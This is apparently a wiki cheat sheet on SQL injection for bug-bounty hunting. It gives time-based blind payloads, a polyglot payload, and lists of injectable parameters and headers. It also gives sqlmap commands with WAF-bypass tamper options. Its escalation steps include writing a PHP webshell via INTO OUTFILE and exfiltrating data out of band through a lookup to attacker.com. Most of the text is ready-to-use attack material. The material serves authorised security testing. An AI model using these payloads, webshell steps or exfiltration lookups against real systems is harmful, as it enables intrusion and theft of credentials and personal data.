====== SQL Injection ======

Legacy code and APIs are most vulnerable. Blind/time-based is most common in the wild.

===== Detection =====

Time-based payloads work when error messages are disabled (most common case):

<code sql>
' or sleep(15) and 1=1#
' or sleep(15)#
' union select sleep(15),null#
'%2Bbenchmark(3200,SHA1(1))%2B'
'+BENCHMARK(40000000,SHA1(1337))+'
</code>

**Polyglot payload (jhaddix):**
<code>
"SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
</code>

===== Where to Test =====

  * Legacy features -- old code = no parameterized queries
  * Both GET and POST -- ''$_GET'' may be safe but ''$_POST'' not
  * Web services and APIs -- especially older REST/SOAP endpoints
  * Search boxes, filter parameters, ordering/sorting parameters
  * HTTP headers: ''User-Agent'', ''X-Forwarded-For'', ''Referer'' (logged to DB)

===== Automation =====

<code bash>
# Parse Burp logs directly
sqlmap -l burp.log --tamper=space2comment --batch

# Target specific URL
sqlmap -u "https://target.com/page?id=1" --dbs

# Bypass WAF blacklists
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,charunicodeencode
</code>

===== Escalation =====

  * Learn the database schema: ''INFORMATION_SCHEMA.TABLES''
  * Read sensitive data: credentials, API keys, PII
  * Write a webshell: ''INTO OUTFILE '/var/www/html/shell.php'''
  * OOB exfiltration when blind: DNS lookup via ''LOAD_FILE('//attacker.com/x')''

===== See Also =====

  * [[tbhm:06_sqli|TBHM SQLi]]
  * [[zseano:escalation|Bug Chaining]]
  * [[zseano:start|Methodology Index]]